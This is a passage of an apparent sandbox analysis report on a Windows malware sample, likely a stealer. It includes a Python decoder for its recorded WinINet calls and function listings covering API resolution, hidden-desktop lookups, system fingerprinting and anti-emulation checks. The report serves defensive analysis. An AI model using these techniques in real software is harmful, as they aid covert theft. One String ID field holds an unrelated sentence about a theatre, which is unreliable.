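QUERY_LEVELS = {19: "HTTP_QUERY_STATUS_CODE"}

# Constructed from the record above: argument lists copied verbatim; '?' marks
# a value the report could not render.
SESSION: List[Tuple[str, str]] = [
    ("InternetOpenA", "0051CFEC,00000001,00000000,00000000,00000000"),
    ("InternetConnectA", "00000000,?,?,00000000,00000000,00000003,00000000,00000000"),
    ("HttpOpenRequestA", "00000000,GET,?,0103DB28,00000000,00000000,-00400100,00000000"),
    ("InternetSetOptionA", "00000000,0000001F,00010300,00000004"),
    ("HttpSendRequestA", "00000000,00000000,00000000,00000000,00000000"),
    ("HttpQueryInfoA", "00000000,00000013,?,?,00000000"),
    ("InternetReadFile", "00000000,?,000007CF,?"),
]


def u32(arg: str) -> int:
    """Fold the report's signed-hex rendering ('-00400100') back into the
    unsigned DWORD the API received (assumption: signed 32-bit display)."""
    return int(arg, 16) & 0xFFFFFFFF


def decode_flags(value: int) -> Tuple[List[str], int]:
    """Split a dwFlags DWORD into known INTERNET_FLAG_* names (highest bit
    first) and the residual bits no table entry covers."""
    known = 0
    for bit in INTERNET_FLAGS:
        known |= bit
    names = [name for bit, name in sorted(INTERNET_FLAGS.items(), reverse=True) if value & bit]
    return names, value & ~known & 0xFFFFFFFF


def describe_call(api: str, args: List[str]) -> dict:
    """Name the numeric arguments of one WinINet call; positions follow the
    documented parameter order, which the report preserves."""
    out: dict = {}
    if api == "InternetOpenA":
        out["access_type"] = OPEN_TYPES.get(u32(args[1]), args[1])
    elif api == "InternetConnectA":
        out["service"] = SERVICES.get(u32(args[5]), args[5])
    elif api == "HttpOpenRequestA":
        out["verb"] = args[1]
        out["flags"], out["unknown_flag_bits"] = decode_flags(u32(args[6]))
    elif api == "InternetSetOptionA":
        out["option"] = OPTIONS.get(u32(args[1]), args[1])   # buffer content not in trace
    elif api == "HttpQueryInfoA":
        out["info_level"] = QUERY_LEVELS.get(u32(args[1]), args[1])
    elif api == "InternetReadFile":
        out["chunk_bytes"] = u32(args[2])
    return out


def describe_session(session: List[Tuple[str, str]]) -> List[Tuple[str, dict]]:
    """Decode every call of a recorded WinINet session in order."""
    return [(api, describe_call(api, args.split(","))) for api, args in session]


if __name__ == "__main__":
    for api, meaning in describe_session(SESSION):
        print(api, meaning)
```

Under the signed reading, 0xFFBFFF00 sets every flag bit except INTERNET_FLAG_KEEP_CONNECTION, including INTERNET_FLAG_SECURE and the two IGNORE_CERT bits; if the dump instead shows the positive value 0x00400100, the same decoder yields INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, so check the raw argument in the memory dump before drawing conclusions about certificate handling. The read loop size of 0x7CF (1999 bytes) and the HTTP_QUERY_STATUS_CODE check are what to expect in network captures of this function: a GET, one status read, then fixed-size reads until InternetReadFile returns no data.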

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2850 4f4a60-4f4afc RtlAllocateHeap 2867 4f4afe-4f4b03 2850->2867 2868 4f4b7a-4f4bbe VirtualProtect 2850->2868 2869 4f4b06-4f4b78 2867->2869 2869->2868
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F4AA3
                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 004F4BB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: the same sixteen dump regions listed under the first function above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-3329630956
                        • Opcode ID: a10cc72b944fb0d04bb1dc08a0b5b5ee41f74d2326ceef86295535e3f0d62aa1
                        • Instruction ID: 505ddd7528df75e50f3810ae700766bb93114f23a4974a5aa89f7e378da30dd3
                        • Opcode Fuzzy Hash: a10cc72b944fb0d04bb1dc08a0b5b5ee41f74d2326ceef86295535e3f0d62aa1
                        • Instruction Fuzzy Hash: 0D31CE29B8033D769620EBEF6C4BF5F6E55FFC6BA0B028057B508571C1C9A25584CEE2
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00512A6F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512A76
                        • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00512A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: the same sixteen dump regions listed under the first function above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: b6d9f103886346b45c1b8f041d0eaaad6aad681d62dc49d80f136b9f0e9d1ad4
                        • Instruction ID: 477f0e1542668a7bfcbc659b30277150687afaac8ad40fd6e6dab8c4c9018c2b
                        • Opcode Fuzzy Hash: b6d9f103886346b45c1b8f041d0eaaad6aad681d62dc49d80f136b9f0e9d1ad4
                        • Instruction Fuzzy Hash: CFF0B4B1A40248ABD720DF88DD49B9EFBBCF704B21F000216FA15E3680D778190486A6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 5166e0-5166e7 634 5166ed-516af9 GetProcAddress * 43 633->634 635 516afe-516b92 LoadLibraryA * 8 633->635 634->635 636 516b94-516c03 GetProcAddress * 5 635->636 637 516c08-516c0f 635->637 636->637 638 516cd2-516cd9 637->638 639 516c15-516ccd GetProcAddress * 8 637->639 640 516cdb-516d4a GetProcAddress * 5 638->640 641 516d4f-516d56 638->641 639->638 640->641 642 516de9-516df0 641->642 643 516d5c-516de4 GetProcAddress * 6 641->643 644 516f10-516f17 642->644 645 516df6-516f0b GetProcAddress * 12 642->645 643->642 646 516f19-516f88 GetProcAddress * 5 644->646 647 516f8d-516f94 644->647 645->644 646->647 648 516fc1-516fc8 647->648 649 516f96-516fbc GetProcAddress * 2 647->649 650 516ff5-516ffc 648->650 651 516fca-516ff0 GetProcAddress * 2 648->651 649->648 652 517002-5170e8 GetProcAddress * 10 650->652 653 5170ed-5170f4 650->653 651->650 652->653 654 517152-517159 653->654 655 5170f6-51714d GetProcAddress * 4 653->655 656 51715b-517169 GetProcAddress 654->656 657 51716e-517175 654->657 655->654 656->657 658 5171d3 657->658 659 517177-5171ce GetProcAddress * 4 657->659 659->658
                        APIs
                        • GetProcAddress.KERNEL32(75550000,01026400), ref: 005166F5
                        • GetProcAddress.KERNEL32(75550000,010263E0), ref: 0051670D
                        • GetProcAddress.KERNEL32(75550000,01038FB8), ref: 00516726
                        • GetProcAddress.KERNEL32(75550000,01038EF8), ref: 0051673E
                        • GetProcAddress.KERNEL32(75550000,0103CA58), ref: 00516756
                        • GetProcAddress.KERNEL32(75550000,0103CAA0), ref: 0051676F
                        • GetProcAddress.KERNEL32(75550000,0102B400), ref: 00516787
                        • GetProcAddress.KERNEL32(75550000,0103CB00), ref: 0051679F
                        • GetProcAddress.KERNEL32(75550000,0103CA88), ref: 005167B8
                        • GetProcAddress.KERNEL32(75550000,0103CBA8), ref: 005167D0
                        • GetProcAddress.KERNEL32(75550000,0103CBF0), ref: 005167E8
                        • GetProcAddress.KERNEL32(75550000,01026340), ref: 00516801
                        • GetProcAddress.KERNEL32(75550000,01026300), ref: 00516819
                        • GetProcAddress.KERNEL32(75550000,01026620), ref: 00516831
                        • GetProcAddress.KERNEL32(75550000,01026640), ref: 0051684A
                        • GetProcAddress.KERNEL32(75550000,0103C9E0), ref: 00516862
                        • GetProcAddress.KERNEL32(75550000,0103CBD8), ref: 0051687A
                        • GetProcAddress.KERNEL32(75550000,0102B568), ref: 00516893
                        • GetProcAddress.KERNEL32(75550000,01026660), ref: 005168AB
                        • GetProcAddress.KERNEL32(75550000,0103C9B0), ref: 005168C3
                        • GetProcAddress.KERNEL32(75550000,0103CAD0), ref: 005168DC
                        • GetProcAddress.KERNEL32(75550000,0103CBC0), ref: 005168F4
                        • GetProcAddress.KERNEL32(75550000,0103C9C8), ref: 0051690C
                        • GetProcAddress.KERNEL32(75550000,010262C0), ref: 00516925
                        • GetProcAddress.KERNEL32(75550000,0103C9F8), ref: 0051693D
                        • GetProcAddress.KERNEL32(75550000,0103CB78), ref: 00516955
                        • GetProcAddress.KERNEL32(75550000,0103CA28), ref: 0051696E
                        • GetProcAddress.KERNEL32(75550000,0103CB18), ref: 00516986
                        • GetProcAddress.KERNEL32(75550000,0103CAB8), ref: 0051699E
                        • GetProcAddress.KERNEL32(75550000,0103CA70), ref: 005169B7
                        • GetProcAddress.KERNEL32(75550000,0103CA40), ref: 005169CF
                        • GetProcAddress.KERNEL32(75550000,0103CAE8), ref: 005169E7
                        • GetProcAddress.KERNEL32(75550000,0103CB30), ref: 00516A00
                        • GetProcAddress.KERNEL32(75550000,01039F88), ref: 00516A18
                        • GetProcAddress.KERNEL32(75550000,0103C920), ref: 00516A30
                        • GetProcAddress.KERNEL32(75550000,0103CB90), ref: 00516A49
                        • GetProcAddress.KERNEL32(75550000,01026320), ref: 00516A61
                        • GetProcAddress.KERNEL32(75550000,0103CC08), ref: 00516A79
                        • GetProcAddress.KERNEL32(75550000,01026360), ref: 00516A92
                        • GetProcAddress.KERNEL32(75550000,0103C938), ref: 00516AAA
                        • GetProcAddress.KERNEL32(75550000,0103CB48), ref: 00516AC2
                        • GetProcAddress.KERNEL32(75550000,01026380), ref: 00516ADB
                        • GetProcAddress.KERNEL32(75550000,010263A0), ref: 00516AF3
                        • LoadLibraryA.KERNEL32(0103C998,0051051F), ref: 00516B05
                        • LoadLibraryA.KERNEL32(0103CB60), ref: 00516B16
                        • LoadLibraryA.KERNEL32(0103C980), ref: 00516B28
                        • LoadLibraryA.KERNEL32(0103C950), ref: 00516B3A
                        • LoadLibraryA.KERNEL32(0103C968), ref: 00516B4B
                        • LoadLibraryA.KERNEL32(0103CA10), ref: 00516B5D
                        • LoadLibraryA.KERNEL32(0103CC50), ref: 00516B6F
                        • LoadLibraryA.KERNEL32(0103CDB8), ref: 00516B80
                        • GetProcAddress.KERNEL32(75750000,01026700), ref: 00516B9C
                        • GetProcAddress.KERNEL32(75750000,0103CCE0), ref: 00516BB4
                        • GetProcAddress.KERNEL32(75750000,010389E0), ref: 00516BCD
                        • GetProcAddress.KERNEL32(75750000,0103CF08), ref: 00516BE5
                        • GetProcAddress.KERNEL32(75750000,010266A0), ref: 00516BFD
                        • GetProcAddress.KERNEL32(73CC0000,0102B180), ref: 00516C1D
                        • GetProcAddress.KERNEL32(73CC0000,010268A0), ref: 00516C35
                        • GetProcAddress.KERNEL32(73CC0000,0102B090), ref: 00516C4E
                        • GetProcAddress.KERNEL32(73CC0000,0103CEA8), ref: 00516C66
                        • GetProcAddress.KERNEL32(73CC0000,0103CE18), ref: 00516C7E
                        • GetProcAddress.KERNEL32(73CC0000,01026680), ref: 00516C97
                        • GetProcAddress.KERNEL32(73CC0000,010267A0), ref: 00516CAF
                        • GetProcAddress.KERNEL32(73CC0000,0103CC20), ref: 00516CC7
                        • GetProcAddress.KERNEL32(757E0000,01026940), ref: 00516CE3
                        • GetProcAddress.KERNEL32(757E0000,01026720), ref: 00516CFB
                        • GetProcAddress.KERNEL32(757E0000,0103CDE8), ref: 00516D14
                        • GetProcAddress.KERNEL32(757E0000,0103CC38), ref: 00516D2C
                        • GetProcAddress.KERNEL32(757E0000,01026880), ref: 00516D44
                        • GetProcAddress.KERNEL32(758D0000,0102B310), ref: 00516D64
                        • GetProcAddress.KERNEL32(758D0000,0102B2C0), ref: 00516D7C
                        • GetProcAddress.KERNEL32(758D0000,0103CE90), ref: 00516D95
                        • GetProcAddress.KERNEL32(758D0000,010267E0), ref: 00516DAD
                        • GetProcAddress.KERNEL32(758D0000,01026820), ref: 00516DC5
                        • GetProcAddress.KERNEL32(758D0000,0102AF00), ref: 00516DDE
                        • GetProcAddress.KERNEL32(76BE0000,0103CCF8), ref: 00516DFE
                        • GetProcAddress.KERNEL32(76BE0000,01026840), ref: 00516E16
                        • GetProcAddress.KERNEL32(76BE0000,01038870), ref: 00516E2F
                        • GetProcAddress.KERNEL32(76BE0000,0103CEC0), ref: 00516E47
                        • GetProcAddress.KERNEL32(76BE0000,0103CE30), ref: 00516E5F
                        • GetProcAddress.KERNEL32(76BE0000,01026780), ref: 00516E78
                        • GetProcAddress.KERNEL32(76BE0000,01026760), ref: 00516E90
                        • GetProcAddress.KERNEL32(76BE0000,0103CD70), ref: 00516EA8
                        • GetProcAddress.KERNEL32(76BE0000,0103CD28), ref: 00516EC1
                        • GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00516ED7
                        • GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00516EEE
                        • GetProcAddress.KERNEL32(76BE0000,CloseDesktop), ref: 00516F05
                        • GetProcAddress.KERNEL32(75670000,01026740), ref: 00516F21
                        • GetProcAddress.KERNEL32(75670000,0103CE60), ref: 00516F39
                        • GetProcAddress.KERNEL32(75670000,0103CD58), ref: 00516F52
                        • GetProcAddress.KERNEL32(75670000,0103CE00), ref: 00516F6A
                        • GetProcAddress.KERNEL32(75670000,0103CE48), ref: 00516F82
                        • GetProcAddress.KERNEL32(759D0000,010268C0), ref: 00516F9E
                        • GetProcAddress.KERNEL32(759D0000,01026960), ref: 00516FB6
                        • GetProcAddress.KERNEL32(76D80000,01026800), ref: 00516FD2
                        • GetProcAddress.KERNEL32(76D80000,0103CC68), ref: 00516FEA
                        • GetProcAddress.KERNEL32(6F5C0000,010266C0), ref: 0051700A
                        • GetProcAddress.KERNEL32(6F5C0000,010269A0), ref: 00517022
                        • GetProcAddress.KERNEL32(6F5C0000,010267C0), ref: 0051703B
                        • GetProcAddress.KERNEL32(6F5C0000,0103CC80), ref: 00517053
                        • GetProcAddress.KERNEL32(6F5C0000,01026980), ref: 0051706B
                        • GetProcAddress.KERNEL32(6F5C0000,010269C0), ref: 00517084
                        • GetProcAddress.KERNEL32(6F5C0000,010269E0), ref: 0051709C
                        • GetProcAddress.KERNEL32(6F5C0000,01026A00), ref: 005170B4
                        • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 005170CB
                        • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 005170E2
                        • GetProcAddress.KERNEL32(75480000,0103CE78), ref: 005170FE
                        • GetProcAddress.KERNEL32(75480000,010388E0), ref: 00517116
                        • GetProcAddress.KERNEL32(75480000,0103CD40), ref: 0051712F
                        • GetProcAddress.KERNEL32(75480000,0103CD10), ref: 00517147
                        • GetProcAddress.KERNEL32(753B0000,01026860), ref: 00517163
                        • GetProcAddress.KERNEL32(6EB50000,0103CDD0), ref: 0051717F
                        • GetProcAddress.KERNEL32(6EB50000,01026A20), ref: 00517197
                        • GetProcAddress.KERNEL32(6EB50000,0103CD88), ref: 005171B0
                        • GetProcAddress.KERNEL32(6EB50000,0103CDA0), ref: 005171C8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                        • API String ID: 2238633743-3468015613
                        • Opcode ID: 796eabaf35e5cf197014f462510a6dbd41c513199b8159f6bf4a27a8b94b5749
                        • Instruction ID: 85366ab8d62fe571a6b7aedf9cc7fe95f86768309a762faa4ea927df215f1c72
                        • Opcode Fuzzy Hash: 796eabaf35e5cf197014f462510a6dbd41c513199b8159f6bf4a27a8b94b5749
                        • Instruction Fuzzy Hash: 656284B450220ADFD7B4DF64ED48E2637B9F788300B08D519EA5593364EB3D9843DB29
                        APIs
                        • lstrlen.KERNEL32(0051CFEC), ref: 0050F1D5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F1F1
                        • lstrlen.KERNEL32(0051CFEC), ref: 0050F1FC
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F215
                        • lstrlen.KERNEL32(0051CFEC), ref: 0050F220
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F239
                        • lstrcpy.KERNEL32(00000000,00524FA0), ref: 0050F25E
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F28C
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F2C0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F2F0
                        • lstrlen.KERNEL32(010263C0), ref: 0050F315
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: 18b881b4ec0da9bf6ac7936143a0a54296f1404969fdb4090ae493975ad3ec4a
                        • Instruction ID: 31d1b0dfcdffe7154d7c5705422efdd88e689ad84c1826175984ba55e3255266
                        • Opcode Fuzzy Hash: 18b881b4ec0da9bf6ac7936143a0a54296f1404969fdb4090ae493975ad3ec4a
                        • Instruction Fuzzy Hash: D2A28170A012068FDB30DF66D949A6EBBF5BF44304F18847AE909DB6A1DB39DC42CB54
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510013
                        • lstrlen.KERNEL32(0051CFEC), ref: 005100BD
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005100E1
                        • lstrlen.KERNEL32(0051CFEC), ref: 005100EC
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510110
                        • lstrlen.KERNEL32(0051CFEC), ref: 0051011B
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051013F
                        • lstrlen.KERNEL32(0051CFEC), ref: 0051015A
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510189
                        • lstrlen.KERNEL32(0051CFEC), ref: 00510194
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005101C3
                        • lstrlen.KERNEL32(0051CFEC), ref: 005101CE
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510206
                        • lstrlen.KERNEL32(0051CFEC), ref: 00510250
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510288
                        • lstrcpy.KERNEL32(00000000,?), ref: 0051059B
                        • lstrlen.KERNEL32(01026600), ref: 005105AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 005105D7
                        • lstrcat.KERNEL32(00000000,?), ref: 005105E3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051060E
                        • lstrlen.KERNEL32(0103D9A8), ref: 00510625
                        • lstrcpy.KERNEL32(00000000,?), ref: 0051064C
                        • lstrcat.KERNEL32(00000000,?), ref: 00510658
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00510681
                        • lstrlen.KERNEL32(010265E0), ref: 00510698
                        • lstrcpy.KERNEL32(00000000,?), ref: 005106C9
                        • lstrcat.KERNEL32(00000000,?), ref: 005106D5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00510706
                        • lstrcpy.KERNEL32(00000000,010388D0), ref: 0051074B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0051077F
                        • lstrcpy.KERNEL32(00000000,0103DBE8), ref: 005107E7
                        • lstrcpy.KERNEL32(00000000,01038B10), ref: 00510858
                        • lstrcpy.KERNEL32(00000000,fplugins), ref: 005108CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00510928
                        • lstrcpy.KERNEL32(00000000,01038A70), ref: 005109F8
                          • Part of subcall function 004F24E0: lstrcpy.KERNEL32(00000000,?), ref: 004F2528
                          • Part of subcall function 004F24E0: lstrcpy.KERNEL32(00000000,?), ref: 004F254E
                          • Part of subcall function 004F24E0: lstrcpy.KERNEL32(00000000,?), ref: 004F2577
                        • lstrcpy.KERNEL32(00000000,01038AE0), ref: 00510ACE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00510B81
                        • lstrcpy.KERNEL32(00000000,01038AE0), ref: 00510D58
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID: fplugins
                        • API String ID: 2500673778-38756186
                        • Opcode ID: 58aa33de28beebd2232ab2f734938217d8da5e7905f82740e75d151645694ea7
                        • Instruction ID: cd99a038ad3b5dbb53fec0615a19ff66848ec562fff3ce34f814c4d0bac4db69
                        • Opcode Fuzzy Hash: 58aa33de28beebd2232ab2f734938217d8da5e7905f82740e75d151645694ea7
                        • Instruction Fuzzy Hash: D5E29270A053418FD734DF29C489BAAFBE0BF88304F58856ED54D8B292DB75D886CB46
                        APIs
                        • lstrlen.KERNEL32(010263C0), ref: 0050F315
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F3A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F3C7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F47B
                        • lstrcpy.KERNEL32(00000000,010263C0), ref: 0050F4BB
                        • lstrcpy.KERNEL32(00000000,01038830), ref: 0050F4EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F59E
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0050F61C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F64C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F69A
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0050F718
                        • lstrlen.KERNEL32(01038980), ref: 0050F746
                        • lstrcpy.KERNEL32(00000000,01038980), ref: 0050F771
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F793
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F7E4
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0050FA32
                        • lstrlen.KERNEL32(01038940), ref: 0050FA60
                        • lstrcpy.KERNEL32(00000000,01038940), ref: 0050FA8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050FAAD
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050FAFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: f1e3b2568a7552a486b589e13038e480c7ab48473ea76b33b500f9f0f819aa5f
                        • Instruction ID: 9547335614e898c3aeea44e5a2df92fae6159273087da8d191bb2c5bb9189c9a
                        • Opcode Fuzzy Hash: f1e3b2568a7552a486b589e13038e480c7ab48473ea76b33b500f9f0f819aa5f
                        • Instruction Fuzzy Hash: 0FF13970A01206CFDB34CF2AD944A6ABBE5BF44314F18C4BED9099B6A1D73ADC42CB55

                        Control-flow Graph
                        • Graph image not reproduced; from its node list: function 508ca0-508eef. The entry block calls StrCmpCA and branches directly to an ExitProcess block (508cc6-508cc7) on one edge; otherwise block 508cff fans out to thirteen comparison blocks (StrCmpCA or lstrlen), which converge on a tail that may call lstrcpy (508ebb-508ebd) before returning through internal functions 4f2a20 and 4f2930.
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 8682d9f5304acd77b39e1024417997cc675f8c62d19d2487f7f774905c2fbb35
                        • Instruction ID: 938ec60b6b1ae3a5b8a049b8f975df0ca57235c29c45aa8407c8634653333acf
                        • Opcode Fuzzy Hash: 8682d9f5304acd77b39e1024417997cc675f8c62d19d2487f7f774905c2fbb35
                        • Instruction Fuzzy Hash: 9A514971A04606ABDB209F75DD84E3F7FF8BF04704B108C2DE582D6691DBB8E9429B25

                        Control-flow Graph
                        • Graph image not reproduced; from its node list: function 512740-512872, essentially straight-line: GetWindowsDirectoryA (512740-512783), GetVolumeInformationA (51278c-5127ea), a short loop at 5127f4-512807, then GetProcessHeap and RtlAllocateHeap (512809-512820), wsprintfA (512826-512844) and a call to internal function 5171e0 (51285b-512872).
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0051277B
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,005093B6,00000000,00000000,00000000,00000000), ref: 005127AC
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0051280F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512816
                        • wsprintfA.USER32 ref: 0051283B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                        • String ID: :\$C
                        • API String ID: 2572753744-3309953409
                        • Opcode ID: f939538ed572e54b54a5f36a8ba45ea5716ea603d720a5283fb1d638f0337201
                        • Instruction ID: 600036ddaac3bbffa9fc4c3b7f793fd2210339f96d44a215f8fa1dce18ed4257
                        • Opcode Fuzzy Hash: f939538ed572e54b54a5f36a8ba45ea5716ea603d720a5283fb1d638f0337201
                        • Instruction Fuzzy Hash: 92316FB1D08209ABDB14CFB889859EFBFBCFF58710F104169E505E7650E6349A418BA6

                        Control-flow Graph
                        • Graph image not reproduced; from its node list: function 4f4bc0-4f4c48: a tight loop at 4f4bd0-4f4bd5, then a single block (4f4bd7-4f4c48) with three operator new (??2@YAPAXI@Z) allocations, lstrlen, InternetCrackUrlA and a call to internal function 4f2a20.
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 004F4BF7
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004F4C01
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004F4C0B
                        • lstrlen.KERNEL32(?,00000000,?), ref: 004F4C1F
                        • InternetCrackUrlA.WININET(?,00000000), ref: 004F4C27
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: 040a8c5425f10425022a330eeba9adc540214f2ddc26414b19eb2fde5cd9bfe1
                        • Instruction ID: 3304781c3b01c1d2faaced3ce951ab2c15667457d4582dc2ac8e550a65fd6326
                        • Opcode Fuzzy Hash: 040a8c5425f10425022a330eeba9adc540214f2ddc26414b19eb2fde5cd9bfe1
                        • Instruction Fuzzy Hash: CB012D71D01218ABEB50DFA9EC45B9EBBB8EB58324F00812AF914E7390DB7459058FD5

                        Control-flow Graph
                        • Graph image not reproduced; from its node list: function 4f1030-4f10b6. The entry block (4f1030-4f1055) calls GetCurrentProcess and VirtualAllocExNuma; one outgoing edge goes straight to ExitProcess (4f1057-4f1058), the other to VirtualAlloc (4f105e-4f107b) followed by an optional VirtualFree (4f108a-4f10ab) before the exit block 4f10b1-4f10b6.
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F1046
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 004F104D
                        • ExitProcess.KERNEL32 ref: 004F1058
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004F106C
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004F10AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                        • String ID:
                        • API String ID: 3477276466-0
                        • Opcode ID: 48e7e41c817d3539ed5a107475e97c3c445643fe934be905abaf8f4f97697267
                        • Instruction ID: b0ede13e4165cc4a8fd02049d187b7a17d58963ab6ef76950383b4c27beb8cc1
                        • Opcode Fuzzy Hash: 48e7e41c817d3539ed5a107475e97c3c445643fe934be905abaf8f4f97697267
                        • Instruction Fuzzy Hash: DD01F471740208BBE7304A656C1AF6B77ADE785B15F348019F708E73D0D9B9EA01866C

                        Control-flow Graph
